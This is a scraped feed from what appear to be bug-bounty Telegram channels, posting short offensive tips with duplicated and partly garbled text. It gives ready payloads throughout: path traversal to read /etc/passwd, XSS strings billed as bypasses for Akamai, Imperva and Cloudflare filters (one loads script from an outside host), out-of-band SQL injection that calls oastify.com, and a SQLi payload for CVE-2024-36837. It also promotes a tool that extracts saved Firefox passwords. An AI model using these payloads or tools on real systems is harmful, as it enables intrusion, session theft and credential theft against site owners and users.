Payload:
site.tld/xyz/xyz/xyz/?path=../../../../../../../../../etc/passwd
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
site.tld/xyz/xyz/xyz/?path=../../../../../../../../../etc/passwd
#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤4⚡3
Bypass dot (.) block in XSS
❌ alert(document.cookie)
✅ alert(cookie)
Some times '
#XSS #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Some times '
cookie' is a variable declared as 'document.cookie'#XSS #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5🔥4❤3
Waf block any
Try HTML injection
Payload:
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
"</"Try HTML injection
</a> worked...Payload:
</a<noscript>alert(document.cookie</noscript>#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4⚡2🔥2
fuzzuli
💬
fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.
🔼 Installation:
fuzzuli requires go1.17 to install successfully. Run the following command to install.
💻 Example:
All:
😸 Github
⬇️ Download
🔒
#Scanner #Backup #Files
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.
fuzzuli requires go1.17 to install successfully. Run the following command to install.
go install -v github.com/musana/fuzzuli@latest
All:
echo https://fuzzuli.musana.net|fuzzuli -mt mixed
## OR
fuzzuli -h
BugCod3#Scanner #Backup #Files
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍3🔥3⚡2
A quick way to find "all" paths for Next.js websites:
👩💻 javanoscript:
#BugBounty #Tips #JS
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
console.log(__BUILD_MANIFEST.sortedPages)console.log(__BUILD_MANIFEST.sortedPages.join('\n'));#BugBounty #Tips #JS
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤3⚡2👍1
LazyDork Tool is Google dorker tool help during google dorking link
🔗 Site
#Google #Dork #Maker
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#Google #Dork #Maker
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5⚡5🔥2👌1
XlsNinja: Multi-Vulnerability Scanner
💬
XlsNinja is a powerful and versatile multi-vulnerability scanner designed to detect various web application vulnerabilities, including Local File Inclusion (LFI), Open Redirects (OR), SQL Injection (SQLi), and Cross-Site Scripting (XSS). This tool was created by AnonKryptiQuz, Coffinxp, Hexsh1dow, and Naho.
📊 Features:
⚪️ LFI Scanner: Detect Local File Inclusion vulnerabilities.
⚪️ OR Scanner: Identify Open Redirect vulnerabilities.
⚪️ SQL Scanner: Detect SQL Injection vulnerabilities.
⚪️ XSS Scanner: Identify Cross-Site Scripting vulnerabilities.
⚪️ Multi-threaded scanning: Improved performance through multi-threading.
⚪️ Customizable payloads: Adjust payloads to suit specific targets.
⚪️ Success criteria: Modify success detection criteria for specific use cases.
⚪️ User-friendly command-line interface: Simple and intuitive.
⚪️ Save vulnerable URLs: Option to save the results of vulnerable URLs to a file.
🔼 Installation:
😸 Github
⬇️ Download
🔒
#Multi #Vulnerability #Scanner
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
XlsNinja is a powerful and versatile multi-vulnerability scanner designed to detect various web application vulnerabilities, including Local File Inclusion (LFI), Open Redirects (OR), SQL Injection (SQLi), and Cross-Site Scripting (XSS). This tool was created by AnonKryptiQuz, Coffinxp, Hexsh1dow, and Naho.
cd lostools
pip install -r requirements.txt
python xlsniNja.py
BugCod3#Multi #Vulnerability #Scanner
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤4⚡4👍4
Top 15 Vulnerability Scanners🔍 📝
#Top #Vulnerability #Scanners
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#Top #Vulnerability #Scanners
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5⚡2🔥2
XSS Bypass Akamai, Imperva and CloudFlare
Payload:
#XSS #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/Root_Exploit
Payload:
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>#XSS #Payload
📣 T.me/BugCod3
📣 T.me/Root_Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6⚡3❤2👍2🌚2
Add to your wordlist:
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
auth/jwt/register
auth-demo/register/classic
auth-demo/register/modern
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤5⚡3🔥3👍1
WAF AKAMAI Bypass
Lead to 30 XSS in large BBP🤯
#BugBounty #Tips #Waf
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Lead to 30 XSS in large BBP🤯
"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">
#BugBounty #Tips #Waf
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤5🔥5⚡3👍1
Out-of-Band SQL Injection
Payload:
#BugBounty #Tips #SQL
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload:
'11111111111' AND (SELECT LOAD_FILE('\\\\http://xde3imh45q8x9o4ovz1kea6cd3ju7kv9.oastify.com\\a'))
'11111111111' AND (SELECT CONCAT('', (SELECT SLEEP(5)), (SELECT LOAD_FILE(CONCAT('\\\\', (SELECT 'http://14379q88wuz10svsm3so5exg47ayyqmf.oastify.com/a'))))))#BugBounty #Tips #SQL
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤3👍3🔥2⚡1
Extract all endpoints from a JS File and take your bug 🐞
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
🔥5❤4👍3⚡1
Firefox Decrypt
💬
Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox™, Waterfox™, Thunderbird®, SeaMonkey®) profiles
💻 Usage:
Github
⬇️ Download
🔒
#Python #Firefox #Extract #Password #Tools
➖➖➖➖➖➖➖➖➖➖
📣 T.me/Root_Exploit
📣 T.me/BugCod3
💬
Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox™, Waterfox™, Thunderbird®, SeaMonkey®) profiles
💻 Usage:
cd firefox_decrypt
python firefox_decrypt.py
Github
⬇️ Download
🔒
BugCod3#Python #Firefox #Extract #Password #Tools
➖➖➖➖➖➖➖➖➖➖
📣 T.me/Root_Exploit
📣 T.me/BugCod3
⚡4❤3🔥3
Finding Hidden Parameter & Potential XSS with Arjun + KXSS
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/Root_Exploit
📣 T.me/BugCod3
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/Root_Exploit
📣 T.me/BugCod3
❤3⚡2🔥2
SQLI Injection
CVE: 2024-36837
Payload:
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
CVE: 2024-36837
Payload:
0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334
#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2⚡2🔥2
JS Recon for IP, Hostname, URL from Waybackurls + LazyEgg
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg[.]py "{}" --js_urls --domains --ips' > jsurls && cat jsurls | grep '\.' | sort -u#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3❤2🔥2👍1
XSS in
Payload:
#BugBounty #Tips #XSS
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Office.com. The + made a difference. Payload:
`'>+<noscript>alert()</noscript>`
#BugBounty #Tips #XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6🔥6❤3